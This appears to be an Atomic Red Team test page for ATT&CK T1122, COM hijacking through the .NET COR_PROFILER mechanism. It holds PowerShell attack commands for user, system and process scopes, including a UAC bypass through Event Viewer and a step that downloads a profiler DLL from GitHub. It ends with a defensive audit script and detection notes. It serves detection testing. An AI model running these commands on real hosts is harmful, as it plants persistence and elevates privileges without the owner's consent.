T1122 - Component Object Model Hijacking
Description from ATT&CK
The Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system. (Citation: Microsoft Component Object Model) Adversaries can use this system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Windows Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead. (Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.
Atomic Tests
- Atomic Test #1 - COM Hijack Leveraging user scope COR_PROFILER
- Atomic Test #2 - COM Hijack Leveraging System Scope COR_PROFILER
- Atomic Test #3 - COM Hijack Leveraging registry-free process scope COR_PROFILER
Atomic Test #1 - COM Hijack Leveraging user scope COR_PROFILER
Creates user scope environment variables and a CLSID COM object registration under HKCU to enable a .NET profiler (COR_PROFILER). The unmanaged profiler DLL (T1122x64.dll by default; the test's build name for it is atomicNotepad.dll) executes when the CLR is loaded by the Event Viewer process. Because Event Viewer starts with high integrity and without a UAC prompt when run by a local administrator, the profiler DLL inherits that integrity level, bypassing UAC, and starts notepad.exe with high integrity. If the account used is not a local administrator, the profiler DLL will still execute each time the CLR is loaded by a process in that user's context, but notepad.exe will not run with high integrity.
Supported Platforms: Windows
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| file_name | unmanaged profiler DLL | Path | PathToAtomicsFolder\T1122\bin\T1122x64.dll |
| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c} |
Attack Commands: Run with powershell!
Write-Host "Creating registry keys in HKCU:\Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
# Register the profiler as an in-process COM server under the user hive (no admin rights needed);
# the default value of InprocServer32 is the DLL the CLR will load for this CLSID
New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value "#{file_name}" -Force | Out-Null
# User-scope environment variables are backed by HKCU:\Environment
New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value "#{file_name}" -Force | Out-Null
Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
# Event Viewer hosts a .NET snap-in, so mmc.exe loads the CLR and therefore the profiler
Start-Process MMC.EXE EVENTVWR.MSC
Cleanup Commands:
Write-Host "Removing registry keys" -ForegroundColor Cyan
Remove-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}" -Recurse -Force
Remove-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -Force | Out-Null
Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -Force | Out-Null
Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -Force | Out-Null
Dependencies: Run with powershell!
Description: #{file_name} must be present
Check Prereq Commands:
if (Test-Path "#{file_name}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (Split-Path "#{file_name}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1122/bin/T1122x64.dll" -OutFile "#{file_name}"
Atomic Test #2 - COM Hijack Leveraging System Scope COR_PROFILER
Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). No CLSID registration is written in this test, so the CLR locates the DLL solely through COR_PROFILER_PATH. System scope environment variables are stored under HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment and only reach processes whose environment block is built after the change, so a restart is required for them to take effect. The unmanaged profiler DLL (T1122x64.dll by default; the test's build name for it is atomicNotepad.dll) then executes when the CLR is loaded by any process. The profiler DLL inherits the integrity level of whichever process loads it: when an elevated process such as Event Viewer run by a local administrator loads the CLR, the DLL bypasses UAC and starts notepad.exe with high integrity. If the account used is not a local administrator, the profiler DLL will still execute each time the CLR is loaded by a process, but notepad.exe will not run with high integrity.
Supported Platforms: Windows
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| file_name | unmanaged profiler DLL | Path | PathToAtomicsFolder\T1122\bin\T1122x64.dll |
| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c} |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
Write-Host "Creating system environment variables" -ForegroundColor Cyan
# Machine-scope variables live under HKLM and require administrator rights to write;
# they are picked up by new logon sessions, hence the restart noted above
New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value "#{file_name}" -Force | Out-Null
Cleanup Commands:
Write-Host "Removing system environment variables" -ForegroundColor Cyan
Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force | Out-Null
Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force | Out-Null
Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force | Out-Null
Dependencies: Run with powershell!
Description: #{file_name} must be present
Check Prereq Commands:
if (Test-Path "#{file_name}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (Split-Path "#{file_name}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1122/bin/T1122x64.dll" -OutFile "#{file_name}"
Atomic Test #3 - COM Hijack Leveraging registry-free process scope COR_PROFILER
Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making any changes to the registry. The variables exist only in the environment block of the current PowerShell session and of the child processes it starts. The unmanaged profiler DLL (T1122x64.dll by default; the test's build name for it is atomicNotepad.dll) executes when the child PowerShell process loads the CLR.
Supported Platforms: Windows
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| file_name | unmanaged profiler DLL | Path | PathToAtomicsFolder\T1122\bin\T1122x64.dll |
| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c} |
Attack Commands: Run with powershell!
# Process scope only: these are set in this shell's environment block and never touch the registry
$env:COR_ENABLE_PROFILING = 1
$env:COR_PROFILER = '#{clsid_guid}'
$env:COR_PROFILER_PATH = '#{file_name}'
# The child powershell.exe inherits the variables, loads the CLR, and the CLR loads the profiler DLL
POWERSHELL -c 'Start-Sleep 1'
Cleanup Commands:
$env:COR_ENABLE_PROFILING = 0
$env:COR_PROFILER = ''
$env:COR_PROFILER_PATH = ''
Dependencies: Run with powershell!
Description: #{file_name} must be present
Check Prereq Commands:
if (Test-Path "#{file_name}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (Split-Path "#{file_name}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1122/bin/T1122x64.dll" -OutFile "#{file_name}"
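An added audit script, not part of Atomic Red Team or of the ATT&CK page, that covers the three scopes exercised by tests #1 to #3. It reads the process, user (HKCU:\Environment) and machine (HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment) copies of the COR_* and CORECLR_* profiler variables, resolves a configured CLSID to its InprocServer32 DLL the way the CLR does (COR_PROFILER_PATH takes precedence on CLR 4 and later; otherwise the CLSID is looked up, user hive before machine hive), and reports whether the DLL exists and carries a valid Authenticode signature. The function name Get-CorProfilerConfig is this example's own; nothing about the page's default CLSID or DLL path is hard-coded.

```powershell
# Added example (not Atomic Red Team code): enumerate every place a .NET profiler
# can be armed on this host, across the process, user and machine scopes used by
# the three T1122 tests. Read-only. Get-CorProfilerConfig is this example's own name.

function Get-CorProfilerConfig {
    [CmdletBinding()]
    param()

    # Both the .NET Framework (COR_*) and .NET Core/5+ (CORECLR_*) variable families
    $names = 'COR_ENABLE_PROFILING', 'COR_PROFILER', 'COR_PROFILER_PATH',
             'CORECLR_ENABLE_PROFILING', 'CORECLR_PROFILER', 'CORECLR_PROFILER_PATH'

    # User and Machine are read from HKCU:\Environment and
    # HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment respectively;
    # Process is the environment block of this shell only.
    $scopes = [System.EnvironmentVariableTarget]::Process,
              [System.EnvironmentVariableTarget]::User,
              [System.EnvironmentVariableTarget]::Machine

    foreach ($scope in $scopes) {
        $vars = @{}
        foreach ($n in $names) {
            $v = [System.Environment]::GetEnvironmentVariable($n, $scope)
            if (-not [string]::IsNullOrEmpty($v)) { $vars[$n] = $v }
        }
        if ($vars.Count -eq 0) { continue }

        $enabled = ($vars['COR_ENABLE_PROFILING'] -eq '1') -or
                   ($vars['CORECLR_ENABLE_PROFILING'] -eq '1')
        $clsid = if ($vars['COR_PROFILER']) { $vars['COR_PROFILER'] } else { $vars['CORECLR_PROFILER'] }
        $path  = if ($vars['COR_PROFILER_PATH']) { $vars['COR_PROFILER_PATH'] } else { $vars['CORECLR_PROFILER_PATH'] }

        # CLR 4+ honours *_PROFILER_PATH directly; only without it is the CLSID
        # resolved, and the user hive is consulted before the machine hive, which is
        # what lets the HKCU registration planted by test #1 work without admin rights.
        $resolved = $path
        $source   = if ($path) { 'PROFILER_PATH variable' } else { $null }
        if (-not $resolved -and $clsid) {
            foreach ($hive in 'HKCU:\Software\Classes\CLSID', 'HKLM:\Software\Classes\CLSID') {
                $key = Join-Path $hive "$clsid\InprocServer32"
                if (Test-Path -LiteralPath $key) {
                    $resolved = (Get-ItemProperty -LiteralPath $key).'(default)'
                    $source   = $key
                    break
                }
            }
        }

        $exists = [bool]($resolved -and (Test-Path -LiteralPath $resolved))
        $signed = $false
        if ($exists) {
            $signed = (Get-AuthenticodeSignature -FilePath $resolved).Status -eq 'Valid'
        }

        [pscustomobject]@{
            Scope        = $scope.ToString()
            Enabled      = $enabled
            Clsid        = $clsid
            ProfilerDll  = $resolved
            ResolvedFrom = $source
            DllExists    = $exists
            Signed       = $signed
        }
    }
}

# Usage: list every scope where profiling is armed, unsigned DLLs first
Get-CorProfilerConfig | Where-Object Enabled | Sort-Object Signed | Format-Table -AutoSize
```

The Process row of a freshly started shell simply repeats the user and machine values, so what matters is a Process row with no registry-backed counterpart, which is what test #3 produces and which is visible only from inside the processes that carry it; for that registry-free case, image-load telemetry on unsigned DLLs loaded into processes that also load clr.dll or coreclr.dll (Sysmon Event ID 7, for instance) is the practical detection, not this script. A validly signed profiler from an APM vendor is expected on instrumented hosts; an unsigned DLL under a user-writable path, or a CLSID that resolves under HKCU\Software\Classes rather than HKLM, is the indicator. Two caveats: a 32-bit CLR resolves the CLSID through the WOW6432Node view, which this example does not walk, and variables set per-user on a host are only visible when the script runs as that user.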